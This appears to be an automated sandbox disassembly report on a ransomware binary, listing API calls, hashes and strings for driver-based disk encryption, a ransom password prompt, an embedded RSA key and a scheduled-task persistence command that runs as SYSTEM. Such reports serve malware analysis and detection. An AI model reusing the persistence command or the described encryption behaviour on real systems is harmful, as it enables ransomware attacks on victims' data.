                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Process$CurrentWindow$Thread$ActiveClipboardCursorInfoLastMemoryStatusTimesValue$CaptureCaretCodeControlCountCounterCreateDesktopDeviceEnumErrorFileFocusForegroundGlobalHeapInputMessageOpenOwnerPagePerformancePopupQueryQueueShellStateTickTimeWindows
                                              • String ID: ($@
                                              • API String ID: 3079641271-1311469180
                                              • Opcode ID: 8814ef365ec9cf631bca7f1271855c8a1e53cc8d467f6fcb0423e3c328077539
                                              • Instruction ID: c46aaf42285b9ce2a735cd5ab694e6767b45f5f002edab2c2b2d9e4574a605c2
                                              • Opcode Fuzzy Hash: 8814ef365ec9cf631bca7f1271855c8a1e53cc8d467f6fcb0423e3c328077539
                                              • Instruction Fuzzy Hash: C461D776E002299FDF20EFB0DD4DBDDBBB4BB18301F00459AE54AA7251DB349A898F51
                                              Function 00A84550 Relevance: 49.2, APIs: 21, Strings: 7, Instructions: 190synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _wprintf.LIBCMT ref: 00A8456B
                                                • Part of subcall function 00A861C0: __lock.LIBCMT ref: 00A861CE
                                                • Part of subcall function 00A861C0: __getch_nolock.LIBCMT ref: 00A861D8
                                              • GetLogicalDrives.KERNEL32 ref: 00A84578
                                              • _memset.LIBCMT ref: 00A845D0
                                              • GetDriveTypeW.KERNEL32(?), ref: 00A845DF
                                              • PathAppendW.SHLWAPI(?,Readme.txt), ref: 00A845F2
                                                • Part of subcall function 00A84490: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A844AA
                                                • Part of subcall function 00A84490: GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A844BD
                                                • Part of subcall function 00A84490: GetProcessHeap.KERNEL32(00000000,00000001,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A844D0
                                                • Part of subcall function 00A84490: HeapAlloc.KERNEL32(00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A844D7
                                                • Part of subcall function 00A84490: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A844F3
                                                • Part of subcall function 00A84490: GetProcessHeap.KERNEL32(00000000,00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A84504
                                                • Part of subcall function 00A84490: HeapFree.KERNEL32(00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A8450B
                                                • Part of subcall function 00A84490: CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A84513
                                              • _wprintf.LIBCMT ref: 00A84673
                                              • _wprintf.LIBCMT ref: 00A84680
                                              • _wscanf.LIBCMT ref: 00A846AC
                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00A846BC
                                              • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00A846D4
                                              • _wprintf.LIBCMT ref: 00A846F7
                                              • GetStdHandle.KERNEL32(000000F5), ref: 00A84706
                                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?), ref: 00A84712
                                              • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,?,00000000,?), ref: 00A84735
                                              • SetConsoleCursorPosition.KERNEL32(00000000,00000000), ref: 00A8473D
                                              • _wprintf.LIBCMT ref: 00A8474E
                                              • _wprintf.LIBCMT ref: 00A8475B
                                              • _wscanf.LIBCMT ref: 00A84787
                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00A84797
                                              • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00A847AF
                                              • _wprintf.LIBCMT ref: 00A847C2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: _wprintf$Heap$ConsoleCreateFile$EventHandleObjectProcessSingleWait_wscanf$AllocAppendBufferCharacterCloseCursorDriveDrivesFillFreeInfoLogicalOutputPathPositionReadScreenSizeType__getch_nolock__lock_memset
                                              • String ID: Disable your anti-virus and anti-malware programs$Enter password#2: $Files decryption completed$:$Incorrect password$Readme.txt$Visit
                                              • API String ID: 2127848508-3595650393
                                              • Opcode ID: 29e4412a07d6cf0a491a8511bfec16a5ef86cbedc4bee4d4e674c313e0ac73a3
                                              • Instruction ID: e66491adafb59dbe7c14692d8eaf4df1a8f5b332b5d8f4a401dba984f6800a8c
                                              • Opcode Fuzzy Hash: 29e4412a07d6cf0a491a8511bfec16a5ef86cbedc4bee4d4e674c313e0ac73a3
                                              • Instruction Fuzzy Hash: BD6182B1E00715ABDF10EFB49C4ABDEBBF4AF48701F10416AE409E6241FB709A448FA5
                                              Function 00A8A1FF Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00A86674,00A95CD0,00000014), ref: 00A8A207
                                              • __mtterm.LIBCMT ref: 00A8A213
                                                • Part of subcall function 00A89F4C: RtlDecodePointer.NTDLL(00000005), ref: 00A89F5D
                                                • Part of subcall function 00A89F4C: TlsFree.KERNEL32(00000003,00A8A375,?,00A86674,00A95CD0,00000014), ref: 00A89F77
                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00A8A229
                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00A8A236
                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00A8A243
                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00A8A250
                                              • TlsAlloc.KERNEL32(?,00A86674,00A95CD0,00000014), ref: 00A8A2A0
                                              • TlsSetValue.KERNEL32(00000000,?,00A86674,00A95CD0,00000014), ref: 00A8A2BB
                                              • __init_pointers.LIBCMT ref: 00A8A2C5
                                              • RtlEncodePointer.NTDLL ref: 00A8A2D6
                                              • RtlEncodePointer.NTDLL ref: 00A8A2E3
                                              • RtlEncodePointer.NTDLL ref: 00A8A2F0
                                              • RtlEncodePointer.NTDLL ref: 00A8A2FD
                                              • RtlDecodePointer.NTDLL(00A8A0D0), ref: 00A8A31E
                                              • __calloc_crt.LIBCMT ref: 00A8A333
                                              • RtlDecodePointer.NTDLL(00000000), ref: 00A8A34D
                                              • __initptd.LIBCMT ref: 00A8A358
                                              • GetCurrentThreadId.KERNEL32 ref: 00A8A35F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                              • API String ID: 3732613303-3819984048
                                              • Opcode ID: 55f7dc30e794a546c114b29ad47d1ed1d7b9eedfa1afca9ef0dfd5343bb75323
                                              • Instruction ID: 1535dd0f4ac9dc37edb942f49c1582a1a57213b18dba2432974c76b33b1f1250
                                              • Opcode Fuzzy Hash: 55f7dc30e794a546c114b29ad47d1ed1d7b9eedfa1afca9ef0dfd5343bb75323
                                              • Instruction Fuzzy Hash: FE312F39B01310ABDF20FBF9AD096573EE4EB65760714052BE514DA1B0EF3888428F92
                                              Function 00A85910 Relevance: 31.6, APIs: 5, Strings: 13, Instructions: 77timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLocalTime.KERNEL32(?), ref: 00A8592B
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A8593F
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A85979
                                              • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00A8598B
                                              • PathAppendW.SHLWAPI(?,?), ref: 00A859F8
                                                • Part of subcall function 00A857B0: _vswprintf_s.LIBCMT ref: 00A857DB
                                                • Part of subcall function 00A85810: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C,?,?), ref: 00A8585A
                                                • Part of subcall function 00A85810: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00A85870
                                                • Part of subcall function 00A85810: lstrcatW.KERNEL32(?,\cmd.exe), ref: 00A85886
                                                • Part of subcall function 00A85810: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00A858EE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Time$System$DirectoryFile$AppendCreateEnvironmentLocalPathProcessVariable_vswprintf_slstrcat
                                              • String ID: $ $ $.$/$d$f$r$s$schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00$u$w$x
                                              • API String ID: 980647657-2418224214
                                              • Opcode ID: b54963bb0eca95562bd71652840d30f536757ae00025cb693dc366fe723db7ff
                                              • Instruction ID: c5ed7fb0abfbe42f65b53653d7b1abc1036783ce25267812f959a1b5f2319030
                                              • Opcode Fuzzy Hash: b54963bb0eca95562bd71652840d30f536757ae00025cb693dc366fe723db7ff
                                              • Instruction Fuzzy Hash: CD3192B1D002189BDF10DFA0EC85BFEBBB5FB04345F004999E90576251DBB65A88CFA0
                                              Function 00A84E00 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 164COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F5), ref: 00A84E24
                                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?), ref: 00A84E31
                                              • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,?,00000000,?), ref: 00A84E58
                                              • SetConsoleCursorPosition.KERNEL32(00000000,00000000), ref: 00A84E60
                                              • _wprintf.LIBCMT ref: 00A84E6B
                                              • TlsGetValue.KERNEL32(?,0022003C,?,00000298,?,00000298,?,00000000), ref: 00A84ED8
                                              • DeviceIoControl.KERNEL32(00000000), ref: 00A84EDF
                                              • _wprintf.LIBCMT ref: 00A84F95
                                              • TlsGetValue.KERNEL32(?,00220038,?,00000298,?,00000298,?,00000000), ref: 00A84FD6
                                              • DeviceIoControl.KERNEL32(00000000), ref: 00A84FDD
                                              • _wprintf.LIBCMT ref: 00A85006
                                              • _wprintf.LIBCMT ref: 00A85013
                                              • _wprintf.LIBCMT ref: 00A8503A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: _wprintf$Console$ControlDeviceValue$BufferCharacterCursorFillHandleInfoOutputPositionScreen
                                              • String ID: Decryption error %d$Disk decryption completed$%-.3f %%$Disk decryption progress...
                                              • API String ID: 3598326828-3817340760
                                              • Opcode ID: 2cfb44f62b80b9cf3bc3d001f22fe6e5f6cea0d236c08ecbbd494d33bbd2cbe3
                                              • Instruction ID: e4b1e6326cab4ee17f2f92dcdb984a748ba9ce1e7cd8d0f6b1c669a1921f890b
                                              • Opcode Fuzzy Hash: 2cfb44f62b80b9cf3bc3d001f22fe6e5f6cea0d236c08ecbbd494d33bbd2cbe3
                                              • Instruction Fuzzy Hash: FC51D7B1E006199BDB24EF64DC45BFEB7B8FB48701F004599E509D2290EE705E85CF94
                                              Function 00A85BF0 Relevance: 24.5, APIs: 2, Strings: 12, Instructions: 41COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00A85C0F
                                              • PathAppendW.SHLWAPI(?,?), ref: 00A85C78
                                                • Part of subcall function 00A85810: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C,?,?), ref: 00A8585A
                                                • Part of subcall function 00A85810: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00A85870
                                                • Part of subcall function 00A85810: lstrcatW.KERNEL32(?,\cmd.exe), ref: 00A85886
                                                • Part of subcall function 00A85810: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00A858EE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: DirectorySystem$AppendCreateEnvironmentPathProcessVariablelstrcat
                                              • String ID: $ $ $.$/$d$f$r$s$u$w$x
                                              • API String ID: 1581931562-2588986813
                                              • Opcode ID: 67df9023eb540ebdb1b2469a4cf744f74e97ed5372a8f8cf198096ed3d2b712e
                                              • Instruction ID: 719b6c9d57b8296fc0efd18aa9c662f814133c6d19704188a81d98db98fa0bcc
                                              • Opcode Fuzzy Hash: 67df9023eb540ebdb1b2469a4cf744f74e97ed5372a8f8cf198096ed3d2b712e
                                              • Instruction Fuzzy Hash: EF1109B0D0130C9BDF00EFA1E8597EEBBB6FB04344F108159D9056A291DBB69A58CF94
                                              Function 00A82340 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 107memoryfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAlloc.KERNEL32(00000000,00000298,00003000,00000040), ref: 00A8235D
                                              • TlsGetValue.KERNEL32(?), ref: 00A82370
                                              • CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A82388
                                              • TlsSetValue.KERNEL32(?,00000000), ref: 00A8239D
                                              • DeviceIoControl.KERNEL32(00000000,00220060,?,00000008,00000000,00000000,?,00000000), ref: 00A823B9
                                              • GetLastError.KERNEL32 ref: 00A823C3
                                              • VirtualLock.KERNEL32(?,00000298), ref: 00A823D6
                                              • TlsGetValue.KERNEL32(?,00220028,?,00000298,?,00000298,?,00000000), ref: 00A82440
                                              • DeviceIoControl.KERNEL32(00000000), ref: 00A82447
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Value$ControlDeviceVirtual$AllocCreateErrorFileLastLock
                                              • String ID: \\.\dcrypt
                                              • API String ID: 233298530-1945893055
                                              • Opcode ID: c29f6ba83f33a4f45b7822b771b3be130e316bcaba868f1163e44c12928d172f
                                              • Instruction ID: 1b4242b80c9b0838d4f95243f20a3a0746cd0207f5da4f3b14c2d3897d92499b
                                              • Opcode Fuzzy Hash: c29f6ba83f33a4f45b7822b771b3be130e316bcaba868f1163e44c12928d172f
                                              • Instruction Fuzzy Hash: 1E31AF76B40315BBEB20EBA4DC59FBB7778EB44711F044155FE09AB2D0DA749E0187A0
                                              Function 00A82470 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106memoryfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAlloc.KERNEL32(00000000,00000298,00003000,00000040), ref: 00A8248D
                                              • TlsGetValue.KERNEL32(?), ref: 00A824A0
                                              • CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A824B8
                                              • TlsSetValue.KERNEL32(?,00000000), ref: 00A824CD
                                              • DeviceIoControl.KERNEL32(00000000,00220060,?,00000008,00000000,00000000,?,00000000), ref: 00A824E9
                                              • GetLastError.KERNEL32 ref: 00A824F3
                                              • VirtualLock.KERNEL32(?,00000298), ref: 00A82506
                                              • TlsGetValue.KERNEL32(?,0022002C,?,00000298,?,00000298,?,00000000), ref: 00A8256B
                                              • DeviceIoControl.KERNEL32(00000000), ref: 00A82572
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Value$ControlDeviceVirtual$AllocCreateErrorFileLastLock
                                              • String ID: \\.\dcrypt
                                              • API String ID: 233298530-1945893055
                                              • Opcode ID: cccbbd754ab83c4339123412529d66a99ce370191bb5b7f177710f2dfbe408df
                                              • Instruction ID: 3b797eab15a81e8b2a4891979d016c2bed834089f48e8f0ea939730d93d44e08
                                              • Opcode Fuzzy Hash: cccbbd754ab83c4339123412529d66a99ce370191bb5b7f177710f2dfbe408df
                                              • Instruction Fuzzy Hash: 8931BE76B80315BBEB20DBA4AC59FBB777CEB45711F044115FE09AB2C0DA759E0187A0
                                              Function 00A81320 Relevance: 16.7, APIs: 11, Instructions: 200memorytimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LocalAlloc.KERNEL32(00000040,000000F0), ref: 00A8135A
                                              • GetSystemDefaultLCID.KERNEL32 ref: 00A81375
                                              • GetTimeZoneInformation.KERNEL32(?), ref: 00A81385
                                              • _memmove.LIBCMT ref: 00A8139F
                                              • NetWkstaGetInfo.NETAPI32(00A94ED4,00000064,?), ref: 00A813BD
                                              • _memmove.LIBCMT ref: 00A81436
                                              • _memmove.LIBCMT ref: 00A81467
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00A814C4
                                              • _memmove.LIBCMT ref: 00A814EF
                                              • LocalFree.KERNEL32(00000000), ref: 00A8154F
                                              • LocalFree.KERNEL32(00000000), ref: 00A8156A
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Local_memmove$AllocFree$DefaultInfoInformationSystemTimeWkstaZone
                                              • String ID:
                                              • API String ID: 605661058-0
                                              • Opcode ID: 31fcd372ce86b5692d246ef517fdad73e559813449706c70e303af173699a381
                                              • Instruction ID: 7337f5f0663313995fb2fabd9724e4838d390b90fb2423482ccb85768ab4401e
                                              • Opcode Fuzzy Hash: 31fcd372ce86b5692d246ef517fdad73e559813449706c70e303af173699a381
                                              • Instruction Fuzzy Hash: 7C719371A002159BDB24EF68DC85FAAB7B9FF44710F0482AAE90D97251DB30DE46CB91
                                              Function 00A835D0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 195fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00A835FA
                                              • CreateFileW.KERNEL32(\\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1),80100000,00000003,00000000,00000003,00000000,00000000,?,?,00A82DD3), ref: 00A83616
                                              • DeviceIoControl.KERNEL32(00000000,00070048,00000000,00000000,?,00000090,?,00000000), ref: 00A83666
                                              • DeviceIoControl.KERNEL32(00000000,002D1080,00000000,00000000,?,0000000C,?,00000000), ref: 00A836A3
                                              • CloseHandle.KERNEL32(00000000,?,?,00A82DD3), ref: 00A83802
                                              Strings
                                              • \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1), xrefs: 00A83611
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: ControlDevice$CloseCreateFileHandle_memset
                                              • String ID: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
                                              • API String ID: 2416907234-457416688
                                              • Opcode ID: acc19ce802b111fc01ce6805f29df70ae8dabba3f938886471ba7e0e7d18f804
                                              • Instruction ID: b190190dbe483552f241f7e5e2c95256e1c2c227d93123093876bd6d5870ba55
                                              • Opcode Fuzzy Hash: acc19ce802b111fc01ce6805f29df70ae8dabba3f938886471ba7e0e7d18f804
                                              • Instruction Fuzzy Hash: 546167B5A40714ABE730DF55DD41BAAF3F4EF48B10F108569F649A72C0D7B0AE848B94
                                              Function 00A83820 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • TlsGetValue.KERNEL32(?,00000001,?,?,?,?,00A82463,?), ref: 00A8382D
                                              • CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,00A82463,?), ref: 00A83845
                                              • TlsSetValue.KERNEL32(?,00000000,?,?,?,?,00A82463,?), ref: 00A8385A
                                              • DeviceIoControl.KERNEL32(00000000,00220064,?,00000004,00000000,00000000,?,00000000), ref: 00A83876
                                              • GetLastError.KERNEL32(?,?,?,?,00A82463,?), ref: 00A83880
                                              • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,00A82463,?), ref: 00A83894
                                              • VirtualUnlock.KERNEL32(?,?,?,?,?,?,00A82463,?), ref: 00A838C2
                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00A82463,?), ref: 00A838D3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Virtual$Value$ControlCreateDeviceErrorFileFreeLastQueryUnlock
                                              • String ID: \\.\dcrypt
                                              • API String ID: 78819294-1945893055
                                              • Opcode ID: 3d3a2e87af144dbccf29ec1b40eb0c2d520cff8250d845f490e15a06b4cd7d39
                                              • Instruction ID: 12c88bfb4d6508cade3046ac94f7a3f2c96dfd0b0876f81d7716ac8db6143928
                                              • Opcode Fuzzy Hash: 3d3a2e87af144dbccf29ec1b40eb0c2d520cff8250d845f490e15a06b4cd7d39
                                              • Instruction Fuzzy Hash: 57213E77A41215BBEF20EBA5DC49FBA3778EB04B51F104105F905EA190DB74AF068BA0
                                              Function 00A81F30 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75memorysynchronizationthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLogicalDrives.KERNEL32 ref: 00A81F43
                                              • GetDriveTypeW.KERNEL32(?), ref: 00A81F88
                                              • LocalAlloc.KERNEL32(00000040,00000050), ref: 00A81F97
                                              • CreateThread.KERNEL32(00000000,00000000,Function_00001E40,00000000,00000000,00000000), ref: 00A81FDC
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00A81FE7
                                              • CloseHandle.KERNEL32(00000000), ref: 00A81FEE
                                              Strings
                                              • MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxX, xrefs: 00A81FB0
                                              • :, xrefs: 00A81F7D
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: AllocCloseCreateDriveDrivesHandleLocalLogicalObjectSingleThreadTypeWait
                                              • String ID: :$MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxX
                                              • API String ID: 3841114299-3934174110
